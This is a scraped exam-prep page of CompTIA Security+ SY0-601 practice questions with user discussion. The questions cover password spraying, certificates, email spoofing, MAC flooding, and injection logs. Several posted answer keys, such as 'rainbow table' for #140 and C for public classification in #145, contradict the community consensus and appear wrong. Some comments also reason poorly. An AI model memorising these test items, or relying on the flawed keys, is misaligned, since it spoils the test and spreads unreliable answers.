A SOC operator is receiving continuous alerts from multiple Linux systems indicating that unsuccessful SSH attempts to a functional user ID have
been attempted on each one of them in a short period of time. Which of the following BEST explains this behavior?

A. Rainbow table attack

B. Password spraying

C. Logic bomb

D. Malware bot

Correct Answer: A

Community vote distribution


B (86%) 14%

  stoneface Highly Voted  5 months ago


SSH cannot take hash values as an input, so rainbow attack out of the table.

Im left with password spraying. ...


upvoted 21 times

  zf1343 6 days, 11 hours ago


With rainbow attack, you don't attack with password hashes! First, you use the table to crack the password for a target user offline and then
use it to attack live systems. Password spraying uses one or few passwords against a list of usernames.
upvoted 2 times

  comeragh Highly Voted  4 months, 4 weeks ago


Selected Answer: B
I believe this is password spraying - "multiple Linux systems to a functional user ID"
upvoted 6 times

  ronniehaang Most Recent  4 days, 6 hours ago


Selected Answer: B
B. Password spraying.

Password spraying is a type of brute-force attack that targets multiple user accounts with a few commonly used passwords. This technique is
used to avoid triggering account lockouts, which are a common security measure to prevent brute-force attacks. The attacker tries a small
number of passwords against many accounts, with the hope of finding one that works. By targeting a large number of systems and trying a
limited number of passwords, the attacker can avoid detection and quickly gain access to one or more systems.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The behavior described in the scenario is likely the result of a password spraying attack. Password spraying is a technique used by attackers to
compromise accounts by trying a small number of commonly used passwords against a large number of user accounts. This allows the attacker
to avoid triggering account lockout policies, which are designed to prevent brute-force attacks by locking an account after a certain number of
failed login attempts. In this case, the attacker is likely using password spraying to try to gain access to the Linux systems via SSH using a
functional user ID. A rainbow table attack, a logic bomb, or a malware bot could potentially cause similar symptoms, but the description of the
behavior in the scenario is most consistent with a password spraying attack.
upvoted 2 times

  Mahougbe 3 months, 1 week ago


Selected Answer: B
A Password Spraying Attack is a type of brute force attack where a malicious actor attempts the same password on many accounts before
moving on to another one and repeating the process.
upvoted 4 times

  ostralo 3 months, 3 weeks ago


Selected Answer: A
I will go for the Rainbow table - because the perpetrator could guess a password using the leaked hash from the system prior to the attack to
crack an account.

Password spray attack - using the same password to crack many different accounts.
upvoted 3 times

  Jakalan7 4 months, 2 weeks ago


Selected Answer: B

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 240/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Clearly B, password spraying.


upvoted 2 times
  tibetbey 4 months, 4 weeks ago
Selected Answer: B
Password Spraying is a variant of what is known as a brute force attack. In a traditional brute force attack, the perpetrator attempts to gain
unauthorized access to a single account by guessing the password "repeatedly" in a very short period of time.
upvoted 2 times

  k9_462 5 months ago


Selected Answer: B
B seems the most correct here. i concur with what stoneface wrote.
upvoted 1 times

  varun0 5 months ago


Selected Answer: B
Password spraying is the answer
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 241/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #141 Topic 1

A tax organization is working on a solution to validate the online submission of documents. The solution should be carried on a portable USB
device that should be inserted on any computer that is transmitting a transaction securely. Which of the following is the BEST certificate for these
requirements?

A. User certificate

B. Self-signed certificate

C. Computer certificate

D. Root certificate

Correct Answer: B

Community vote distribution


A (71%) C (17%) 13%

  deeden Highly Voted  4 months, 2 weeks ago


Selected Answer: A
I though option A make sense - if acquired from a publicly trusted CA. Found this link below from IdenTrust about IRS Secure Data Transfer...

https://www.identrust.com/partners/department-treasury-irs-secure-data-transfer
upvoted 5 times

  ronniehaang Most Recent  4 days, 6 hours ago


Selected Answer: A
A. User certificate would be the BEST certificate for these requirements.

A user certificate is a digital certificate that is used to authenticate a user. The certificate is issued by a trusted certificate authority and contains
the user's public key and identity information. In this case, the portable USB device would have the user certificate stored on it, which would be
used to authenticate the user when submitting the online documents. This would ensure that the submission of documents is secure and
validated.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: A
The best certificate for these requirements would be a user certificate. A user certificate is a digital certificate that is issued to an individual and is
used to authenticate the user's identity when accessing a network or system. In this case, the organization could issue a user certificate to each
individual who is authorized to submit documents online, and the certificate could be stored on a portable USB device. When the individual
inserts the USB device into a computer and initiates a transaction, the user certificate would be used to securely authenticate the user's identity
and allow the transaction to be processed. Other types of certificates such as a self-signed certificate, a computer certificate, or a root certificate
could potentially be used for these purposes, but a user certificate would be the most appropriate solution in this scenario.
upvoted 2 times

  EubertT 1 month, 3 weeks ago


I'm going to give details of what is the use of each one, because I'm tired that are not giving the right answer:

User Certificate: User certificates specify which resources a given user can have access to. They are sometimes used on devices that several
users share. When different users log in, their profile and certificate are automatically loaded, granting them access to their required information.

Self-signed certificate: A self-signed certificate is one that is not signed by a CA at all – neither private nor public. In this case, the certificate is
signed with its own private key, instead of requesting it from a public or a private CA (Certificate Authority).

Root Certificate: Root certificates are the cornerstone of authentication and security in software and on the Internet. They're issued by a certified
authority (CA) and, essentially, verify that the software/website owner is who they say they are.

So for this verification I'm completely 100% sure is A: User certificate


upvoted 1 times

  shitgod 1 month, 1 week ago


You didn't mention anything about a computer certificate.
upvoted 1 times

  Juraj22 2 months, 1 week ago


Selected Answer: A
For me nothing is better than ROOT and USER certificate, We have situation, where you can plug USB and validate something via
something....and what is it "something"? You need to validate via ROOT, therefore maybe ROOT. 100% cant be self signed. Never trust self-
signed. Bad answer as every second answer here. Read the discussion. Also cant be computer. because computer can chcange. User or Root,
Root has more secure, User is more common.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 242/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 3 times
  amberlj102 2 months, 2 weeks ago
User certificates are stored under the register HKEY_CURRENT_USER root and is local to the user account. the ability to carry the certificate on
a USB drive would eliminate option A. Id have to go with option D
upvoted 1 times

  lordguck 3 months ago


A: should be right, although the question is about an organization. A root cert is used to sign other certs and not used in "production
environments". https://en.wikipedia.org/wiki/Root_certificate
upvoted 1 times

  mark9999 4 months, 1 week ago


Selected Answer: A
Sorry, the web server is code signing the website as validation...it's a user cert
upvoted 2 times

  mark9999 4 months, 1 week ago


Selected Answer: C
"online submission of documents" so contact a Public CA.
The Root certificate stays on the Root CA and issued to any Intermediate CA's.
The computer certs are generated on the intermediate(for a Web Server, to do Online submissions) and then both the Private key(on a Company
Web Server) and the X509 computer cert public key is with the Tax Organization.
They need to make the cert portable so put it on a USB device, attach to any computer.
User certs are for use by users for e-mail, EFS and client auth
Self-signed certs are unsafe for public facing apps like this one.
Root Certs are for the CA's not the end users.
upvoted 4 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: D
I guess it's D
upvoted 1 times

  RonWonkers 4 months, 1 week ago


Sorry, i'm going with A
upvoted 1 times

  enginne 4 months, 2 weeks ago


Selected Answer: A
After granting the power of attorney, the user signs the documents, the person responsible for the financial notification
upvoted 4 times

  sonerim88 4 months, 3 weeks ago


Can anyone explain this question, please? I checked 3 different resources and found 3 different answers.
upvoted 4 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: D
Root Certificate should be more appropriate
upvoted 2 times

  Strykar 4 months, 1 week ago


and why is that?
upvoted 1 times

  banditring 5 months ago


but shouldn't you never trust a self-signed certificate? Someone explain how this is correct for me please.
upvoted 1 times

  okay123 5 months ago


self-signed certificate is a certificate that's signed with its own private key.
upvoted 1 times

  zzzfox 4 months, 3 weeks ago


ok, self-signed certificated is used your own company, the question is bit unclear. when its asking for any computer, not sure if it is referring to
any computer within TAX org.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 243/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #142 Topic 1

A routine audit of medical billing claims revealed that several claims were submitted without the subscriber's knowledge. A review of the audit
logs for the medical billing company's system indicated a company employee downloaded customer records and adjusted the direct deposit
information to a personal bank account.
Which of the following does this action describe?

A. Insider threat

B. Social engineering

C. Third-party risk

D. Data breach

Correct Answer: A

Community vote distribution


A (100%)

  i_bird Highly Voted  4 months, 2 weeks ago


Selected Answer: A
going to jail..lol
upvoted 9 times

  joelitof 4 months, 1 week ago


xD rip that person
upvoted 2 times

  RonWonkers Most Recent  4 months, 2 weeks ago


Selected Answer: A
It is A, company employee = insider threat
upvoted 4 times

  comeragh 4 months, 4 weeks ago


Selected Answer: A
A - Insider Threat
upvoted 4 times

  tibetbey 4 months, 4 weeks ago


Selected Answer: A
Insider threat is the potential for an insider to use their authorized access or understanding of an organization to harm that organization
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 244/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #143 Topic 1

A recent audit cited a risk involving numerous low-criticality vulnerabilities created by a web application using a third-party library. The
development staff state there are still customers using the application even though it is end of life and it would be a substantial burden to update
the application for compatibility with more secure libraries. Which of the following would be the MOST prudent course of action?

A. Accept the risk if there is a clear road map for timely decommission.

B. Deny the risk due to the end-of-life status of the application.

C. Use containerization to segment the application from other applications to eliminate the risk.

D. Outsource the application to a third-party developer group.

Correct Answer: C

Community vote distribution


C (54%) A (46%)

  [Removed] Highly Voted  5 months ago


Selected Answer: C
I think C is correct. You shouldn't have to take any risk at all if you can containerize the application. The goal of containerization is to isolate an
application to prevent malware, intruders, system resources or other applications from interacting with the application – and any of its sensitive
information — secured by the container.
upvoted 29 times

  [Removed] 5 months ago


Resource:https://www.proofpoint.com/sites/default/files/pp-containerization-and-app-reputation.pdf
upvoted 2 times

  stoneface Highly Voted  5 months ago


Selected Answer: A
IMO they should Accept the risk if there is a clear road map for timely decommission ->
upvoted 9 times

  deeden 4 months, 2 weeks ago


I agree with A. The web app will have the same threat vector 3rd-party library even after containerization, and is rated as low risk vulnerability.
upvoted 3 times

  T4IT Most Recent  1 week, 5 days ago


Selected Answer: A
low risk vulnerability!! going with A
upvoted 1 times

  ZDW 1 week, 5 days ago


Selected Answer: C
I think it is C because nothing mentions they are wanting to decommission it, they have customers that still use it and they don't want to pay for
an improve updated app so containerizing it makes sense. allows them to keep it for customers to use, keeps it secure, and doesn't cost like the
update would.
upvoted 2 times

  xxxdolorxxx 1 week, 5 days ago


Selected Answer: A
I'm going with A.
upvoted 1 times

  Deeppain90 1 week, 6 days ago


Selected Answer: A
iits the best option
upvoted 1 times

  viksap 1 month, 2 weeks ago


Not sure if I’m thinking in the right direction but Containerization would be better choice even though company is planning to decommission it.
Any thoughts?
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: C

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 245/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Why would choose A… This is Just CompTIA Questions. Customers are still using the application.. Companies won’t sporadically kills an
application just because. If special requirements still exist, then the application will be use until further notifcation for that matter.. Some
companies would still used software/hardware that are still clasify in the legacy criteria. Companies still required to continue their business
operational normally. They just don’t automatically switch on or off just because.. C answer seems appropiate to me..
upvoted 2 times
  FMMIR 1 month, 3 weeks ago
Selected Answer: A
The most prudent course of action would be to accept the risk if there is a clear road map for timely decommission. If the application is end of life
and there are still customers using it, it may not be feasible to update the application for compatibility with more secure libraries. In this case, it
would be best to accept the risk and create a plan to decommission the application in a timely manner to minimize the potential impact of the
vulnerabilities. This could involve transitioning customers to a different application or working with the development team to implement other
mitigation strategies
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: Accept the risk if there is a clear road map for timely decommission.

The audit found low-criticality vulnerabilities so, from the organization's perspective, it's not an issue that requires immediate attention. If the
organization's understands the level of severity of the vulnerabilities and plans to decommission the application when they see fit, then that
would be the most prudent(practical) action for them.

There are still users that are using the application, so there should be time given to notify the users when it is time to decommission the
application to minimize disruption.
upvoted 4 times

  carpathia 2 months, 3 weeks ago


Selected Answer: A
containerization in Sec+ documentation mostly refers to MDM; I would go with A. The rest involves virtualization etc. I doubt that would be the
answer. Maybe I am wrong> someone with actual experience in the field would be more precise.
upvoted 2 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: A
'prudent course of action" pru·dent=acting with or showing care and thought for the future.
A accept the risk if there is a clear road map for timely decommission
upvoted 4 times

  Zenvega 4 months ago


Selected Answer: A
Im going with A, because C says to incorporate containerization to "eliminate the risk"; as I dont believe it will eliminate all risk.
upvoted 3 times

  i_bird 4 months, 2 weeks ago


Selected Answer: A
Keywords:
1; numerous LOW-CRITICLITY vuns
2; EOL

Accept the risk...


upvoted 3 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
I would say it's C, I found 2 other sites that claim C aswell but they might have just copied each others answers.

https://www.comptiadump.com/3-mar-2022-new-security-sy0-601-dumps-with-vce-and-pdf-from-passleader-new-questions.html

https://quizlet.com/716263963/sy0-601-exam-flash-cards/
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: C
going with C here
upvoted 2 times

  comeragh 5 months ago


Selected Answer: A
I would go with A for this one
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 246/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #144 Topic 1

A security analyst is evaluating solutions to deploy an additional layer of protection for a web application. The goal is to allow only encrypted
communications without relying on network devices. Which of the following can be implemented?

A. HTTP security header

B. DNSSEC implementation

C. SRTP

D. S/MIME

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
When enabled on the server, HTTP Strict Transport Security (HSTS), part of HTTP Security header, enforces the use of encrypted HTTPS
connections instead of plain-text HTTP communication.
upvoted 13 times

  ronniehaang Most Recent  4 days, 6 hours ago


Selected Answer: A
A. HTTP security header - An HTTP security header can be added to the web application to enforce the use of encryption for all communication.
This header can specify the use of Transport Layer Security (TLS) or Secure Sockets Layer (SSL) protocols to ensure that all data transmitted
between the web server and client is encrypted. The header can also configure various security-related options such as disabling caching,
preventing cross-site scripting (XSS) attacks, and mitigating cross-site request forgery (CSRF) attacks.

HTTP security headers include:

Strict-Transport-Security (HSTS)
X-XSS-Protection
X-Content-Type-Options
X-Frame-Options
Content-Security-Policy
Note: HTTP security headers are not a replacement for encryption but rather a way to enforce encryption.
upvoted 1 times

  rhocale 1 month, 2 weeks ago


i thought HTTP isn't secure
upvoted 1 times

  deeden 4 months, 2 weeks ago


Selected Answer: A
https://www.youtube.com/watch?v=064yDG7Rz80
upvoted 1 times

  comeragh 4 months, 4 weeks ago


Selected Answer: A
I would agree with A on this one
S/MIME - relates to email
SRTP - relates to VOIP
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 247/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #145 Topic 1

A company labeled some documents with the public sensitivity classification. This means the documents can be accessed by:

A. employees of other companies and the press.

B. all members of the department that created the documents.

C. only the company's employees and those listed in the document.

D. only the individuals listed in the documents.

Correct Answer: C

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: A
Public (unclassified)—there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but
does present a risk if it is modified or not available.
upvoted 17 times

  stonefaces_kitten 2 months, 2 weeks ago


Thank you (:
upvoted 3 times

  Deeppain90 2 weeks, 5 days ago


Most Recent 
owww I get it now its "company labeled some documents with the public sensitivity classification" so DOCUMENTS in company even if they are
unclassified are not for shere, from answer C is the one (sorry for my gramar)
upvoted 2 times

  Deeppain90 2 weeks, 5 days ago


Selected Answer: A
WHY C is the chosen answer 0o
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: A
A company labeled some documents with the public sensitivity classification means that the documents can be accessed by employees of other
companies and the press. The public sensitivity classification indicates that the documents are intended for public access and can be shared
with a wide audience, including employees of other companies and members of the media. This classification is often used for documents that
contain information that is not sensitive or confidential and that can be shared freely with the public. In contrast, documents with other sensitivity
classifications, such as "confidential" or "private," may have more restricted access and may only be shared with a limited group of individuals,
such as employees of the company or those listed in the document.
upvoted 2 times

  Nome02 2 months ago


A is the correct answer. The Public Sensitivity is Public.
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
I aint going to lie...I read this all the way wrong. I was thinking that it was referring to NOT allowing the public to see it. But...BUT it is classified as
"Public" information.
upvoted 2 times

  aslakhaege 4 months, 3 weeks ago


Selected Answer: A
A is correct
upvoted 1 times

  k9_462 5 months ago


Selected Answer: A
should be A. public is the least sensitive data class
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 248/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #146 Topic 1

Which of the following is the MOST relevant security check to be performed before embedding third-party libraries in developed code?

A. Check to see if the third party has resources to create dedicated development and staging environments.

B. Verify the number of companies that downloaded the third-party code and the number of contributions on the code repository.

C. Assess existing vulnerabilities affecting the third-party code and the remediation efficiency of the libraries' developers.

D. Read multiple penetration-testing reports for environments running software that reused the library.

Correct Answer: C

Community vote distribution


C (100%)

  SabITSec 2 months, 1 week ago


b is the possible answer too
upvoted 1 times

  Imanism 3 months, 2 weeks ago


Selected Answer: C
What to be done to best prevent issues in third-party code?

Establish a baseline and process for every third-party software that is introduced into the organisation, including performing a risk assessment to
establish the risk associated with implementing a certain piece of code.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
My guess is C
upvoted 2 times

  comeragh 4 months, 4 weeks ago


Selected Answer: C
I would go with C also on this one. It seems to make the most sense.
upvoted 4 times

  varun0 5 months ago


Selected Answer: C
C is correct
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 249/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #147 Topic 1

A help desk technician receives an email from the Chief Information Officer (CIO) asking for documents. The technician knows the CIO is on
vacation for a few weeks. Which of the following should the technician do to validate the authenticity of the email?

A. Check the metadata in the email header of the received path in reverse order to follow the email's path.

B. Hover the mouse over the CIO's email address to verify the email address.

C. Look at the metadata in the email header and verify the ‫ג‬€From:‫ג‬€ line matches the CIO's email address.

D. Forward the email to the CIO and ask if the CIO sent the email requesting the documents.

Correct Answer: A

Community vote distribution


A (52%) D (29%) Other

  stoneface Highly Voted  5 months ago


Selected Answer: A
https://www.cmu.edu/iso/news/2020/email-spoofing.html
upvoted 6 times

  vandybear 3 months ago


The URL you provided states, "Please note that email headers can be spoofed and are not always reliable. " Wouldn't that make answer A
unreliable?
upvoted 2 times

  Sandon 1 week, 4 days ago


Yes, yes it would
upvoted 2 times

  ostralo 3 months, 3 weeks ago


I concur
return path verification is a must.
upvoted 1 times

  Bl1024 Most Recent  3 days, 13 hours ago


Selected Answer: D
Spoofing makes all other answers unreliable
upvoted 1 times

  ronniehaang 4 days, 5 hours ago


Selected Answer: A
A help desk technician should follow best practices in email security to validate the authenticity of the email. One of the best ways to validate the
authenticity of an email is to check the metadata in the email header and verify the From: line matches the CIO's email address. Additionally, the
technician can hover the mouse over the CIO's email address to verify the email address, which will show the actual email address the email was
sent from. If there is any doubt about the authenticity of the email, the technician can also forward the email to the CIO and ask if the CIO sent
the email requesting the documents.
upvoted 1 times

  Boubou480 4 weeks ago


Selected Answer: C
To validate the authenticity of the email, the technician should check the metadata in the email header and verify that the "From:" line matches
the CIO's email address. The "From:" line in the email header indicates the sender of the email, and it is important to verify that it matches the
expected email address for the CIO. This will help to ensure that the email is legitimate and not a phishing attempt or a spoofed email. Checking
the metadata in the email header of the received path in reverse order to follow the email's path is not a reliable way to verify the authenticity of
the email. Hovering the mouse over the CIO's email address to verify the email address may not be sufficient, as it is possible to create a fake
email address that appears legitimate when hovered over. Forwarding the email to the CIO and asking if the CIO sent the email requesting the
documents is a good idea, but it is not the only step that should be taken to verify the authenticity of the email.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
I believe the answer is C:
To validate the authenticity of the email, the help desk technician should look at the metadata in the email header and verify the "From:" line
matches the CIO's email address. The email header contains information about the email's path and sender, and examining this information can
help to determine whether the email is genuine or not. In particular, the "From:" line should match the CIO's email address, and if it does not, this
may indicate that the email is not legitimate. Checking the metadata in the email header is a more reliable way to validate the authenticity of the
email than hovering the mouse over the CIO's email address or forwarding the email to the CIO and asking if it was sent by them.

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 250/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  Blueteam 2 months, 2 weeks ago
Option A is correct.
Search for "How to scan email headers for phishing and malicious content".
https://resources.infosecinstitute.com/topic/how-to-scan-email-headers-for-phishing-and-malicious-content/
upvoted 1 times

  J_Ark1 2 months, 4 weeks ago


Selected Answer: A
I think that it could be related to SSL and or TLS, SHH thats what the meta data could be refering to...
upvoted 1 times

  CapJackSparrow 3 months, 2 weeks ago


Selected Answer: D
my company has us forward risky emails to the IT department..
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


Replying to the email would do no good, because it will go to the return address on a potentially spoofed email. FORWARDING the email to the
CIO's address, will confirm that only someone who can login to that mailbox will be able to see the message?
upvoted 3 times

  deeden 4 months, 2 weeks ago


Selected Answer: B
I believe majority of people here received a few spoofed emails in the past and most often just do option B as it is most efficient. I mean, unless
the actual email address is CIO.name@gmail.com then I would probably call the CIO mobile phone and perform verification, would you agree?
upvoted 2 times

  Swarupam 4 months, 4 weeks ago


Selected Answer: A
A should be the correct approach
upvoted 3 times

  j0n45 5 months ago


Selected Answer: D
But why not forwarding the mail to the CIO himself?
upvoted 3 times

  CertAddict69 3 months, 3 weeks ago


I think you have it bang on here. Obviously Forwarding, not replying (Which could send the reply to someone who spoofed the address)
upvoted 1 times

  banditring 5 months ago


because someone else could be using his email Im thinking
upvoted 2 times

  CertAddict69 3 months, 3 weeks ago


if someone else is using his email, then none of these options work. If you suspect the account is compromised, you would call the user
and verify over the phone or another communication method that does not involve the email address.
upvoted 2 times

  Sandon 1 week, 4 days ago


Very true
upvoted 1 times

  Liftedkris 5 months ago


Why would you forward the email to the same email address you are trying to verify?
upvoted 3 times

  Ranaer 3 weeks, 1 day ago


Forward isnt reply. If the source email just looks like the CIO's email, forwarding to the actual CIO's email, wouldnt go to the scammer.
upvoted 1 times

  CertAddict69 3 months, 3 weeks ago


Because when you forward it and type a specific email address, the email will go to that mailbox and only someone with access to that
mailbox will be able to read and reply to the email. Checking the headers for the From address could be forged and tracing the email back
will only find it's sending IP address, without 100% accuracy.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 251/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #148 Topic 1

A company needs to validate its updated incident response plan using a real-world scenario that will test decision points and relevant incident
response actions without interrupting daily operations. Which of the following would BEST meet the company's requirements?

A. Red-team exercise

B. Capture-the-flag exercise

C. Tabletop exercise

D. Phishing exercise

Correct Answer: C

Community vote distribution


C (64%) D (27%) 9%

  TR3Y Highly Voted  4 months, 1 week ago


A Cyber Security tabletop exercise is a discussion-based event (not real). If they are looking for "real world" solution to validate their IRP then the
best option would be a "Red Team" as they can simulate a real-world event testing your organizations IRP. let me know If I am missing
something.
upvoted 6 times

  03allen 3 months, 3 weeks ago


"without interrupting daily operation" would be the reason.
upvoted 3 times

  MSCertifications Most Recent  1 week, 1 day ago


Selected Answer: D
I'll go with phishing
upvoted 1 times

  nicekoda 1 month ago


Answer is Red team exercise. The actions are real world and intended to simulate the operational approach of a ransomware-style attack without
overwriting sensitive files.
upvoted 1 times

  alwaysrollin247 1 month, 2 weeks ago


Selected Answer: A
Red Team exercises differ from penetration testing in that they don’t focus on a single application or system, but instead set out to exploit
multiple systems and potential avenues of attack. The gloves are off, and “Think like an attacker” is the rule of play. Usually, Red Teams are part
of your internal security team, though sometimes they can be from external or dedicated agencies. While thinking like an attacker, a Red Team
group acts as (and provides security feedback from the perspective of) a malicious threat or challenger. It’s up to the business’s dedicated
security team – the Blue Team – to provide a suitable response in detecting, combating, and weakening their opposition. Prior to the Red Team
exercise, it’s usual that the Blue Team won’t know the plan or what is coming. This is in order to make the exercise as realistic as possible.

https://www.imperva.com/blog/what-are-red-team-exercises-and-why-are-they-important/
upvoted 1 times

  KingTre 1 month, 3 weeks ago


Selected Answer: D
Although table top is a the most voted answer , "without interruping daily operations" leads me to think D would be correct.

Tabletops involve physical participants to sit down and talk through incidents. This would take time and people away from daily operations.

A phishing tactic could be done by 1 security officer and sent out as a daily email. Correct me if I'm wrong.
upvoted 2 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
C is correct
upvoted 3 times

  serginljr 4 months, 3 weeks ago


Selected Answer: C
C is the correct answer
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 252/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #149 Topic 1

Security analysts are conducting an investigation of an attack that occurred inside the organization's network. An attacker was able to collect
network traffic between workstations throughout the network. The analysts review the following logs:

The Layer 2 address table has hundreds of entries similar to the ones above. Which of the following attacks has MOST likely occurred?

A. SQL injection

B. DNS spoofing

C. MAC flooding

D. ARP poisoning

Correct Answer: C

Community vote distribution


C (100%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: MAC flooding

The question mentions that the table is on Layer 2 which is the Data link layer. The data-link layer is where switches operates on to move traffic.
Switches will use MAC addresses to find the physical address of the device. This is because the Layer 2 address(MAC Address) will be unique on
the local network.

MAC flooding is a cyber attack that overflows the MAC Table (Layer 2 Table) of switches by sending out invalid MAC addresses.

When a MAC Address table is full, the switch is no longer able to save new addresses, so it will enter into fail-open mode and begin broadcasting
data (like a hub) to all ports. This will allow an attacker to get data packets intended for another computer and be able to steal sensitive
information.
upvoted 5 times

  deeden Most Recent  4 months, 2 weeks ago


Selected Answer: C
I agree with MAC flooding. Here's a good read about it and how to prevent.
https://www.omnisecu.com/ccna-security/what-is-mac-flooding-attack-how-to-prevent-mac-flooding-attack.php
upvoted 3 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: C
Hundreds of entries, I would assume its flooding
upvoted 3 times

  _Tyler_ 4 months, 4 weeks ago


Selected Answer: C
All the other answers involve an attack that changes data that is already present this question states that there are hundreds of entries indicating
flooding.
upvoted 4 times

  ScottT 4 months, 3 weeks ago


and Layer 2 ruling out SQL and DNS
upvoted 1 times

  Yuyuyakuza 5 months ago


Mac Flooding "Layer 2.."
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 253/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #150 Topic 1

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against
corporate credentials. Which of the following controls was being violated?

A. Password complexity

B. Password history

C. Password reuse

D. Password length

Correct Answer: A

Community vote distribution


A (87%) 7%

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Password complexity

Password complexity is a measure of how difficult a password is to guess in relation to any number of guessing or cracking methods. For the
security auditor to be able to successfully perform a dictionary attack, that means that the credentials were too predictable and was likely a
common password.
upvoted 5 times

  xxxdolorxxx Most Recent  1 week, 5 days ago


Selected Answer: A
A makes the most amount of sense to me.
upvoted 1 times

  NICKJONRIPPER 2 months, 1 week ago


Selected Answer: C
passwords in common dictionary is not necessarily not complex. In the well-known "/usr/share/wordlists/rockyou.txt" dictionary, we can find
passwords like "arisDAN13032008", "arires_super13@hotmail.cpom"... So it`s about reuse, not about complexity.
upvoted 1 times

  Sandon 1 month, 3 weeks ago


That ain't it
upvoted 1 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: A
Not even sure how that one person got D. The answer is A all the way. Complexity refers to how the password needs to be formatted.
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


Selected Answer: A
It is A
upvoted 2 times

  Ay_ma 4 months, 3 weeks ago


Selected Answer: D
According to guidance offered by the National Institute of Standards and Technology (NIST), password length is more important than password
complexity. This actually makes a lot of sense as longer passphrases take longer to crack, and they are easier to remember than a string of
meaningless characters.
NIST has provided a number of additional recommendations for organizations to follow, some of which include:

- Passphrases should consist of 15 or more characters.


- Uppercase, lowercase, or special characters are not required.
- Only ask users to change their passwords if you believe your network has been compromised.
- Check all new passwords against a list of passwords that are frequently compromised.
- Avoid locking your users out of their accounts after a number of unsuccessful login attempts, as hackers will often try to flood networks by
purposely trying incorrect passwords in order to lock users out of their accounts.
- Don’t allow password “hints.”

www.lepide.com

I'm inclined to go for option D

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 254/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times

  rhocale 1 month, 2 weeks ago


this would make sense except the fact that its a dictionary account and length of words wont stop a dictionary account its still a basic word
upvoted 1 times

  RonWonkers 4 months, 2 weeks ago


This might be true but it does not answer the question.

The question is: Which of the following controls was being violated?
When using a standard word you violate complexity control.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A here
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 255/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #151 Topic 1

A SOC operator is analyzing a log file that contains the following entries:

Which of the following explains these log entries?

A. SQL injection and improper input-handling attempts

B. Cross-site scripting and resource exhaustion attempts

C. Command injection and directory traversal attempts

D. Error handling and privilege escalation attempts

Correct Answer: C

Community vote distribution


C (100%)

  stoneface Highly Voted  5 months ago


Selected Answer: C
C. Command injection and directory traversal attempts
upvoted 10 times

  ScottT 4 months, 3 weeks ago


https://www.professormesser.com/security-plus/sy0-401/directory-traversal-and-command-injection-2/
upvoted 7 times
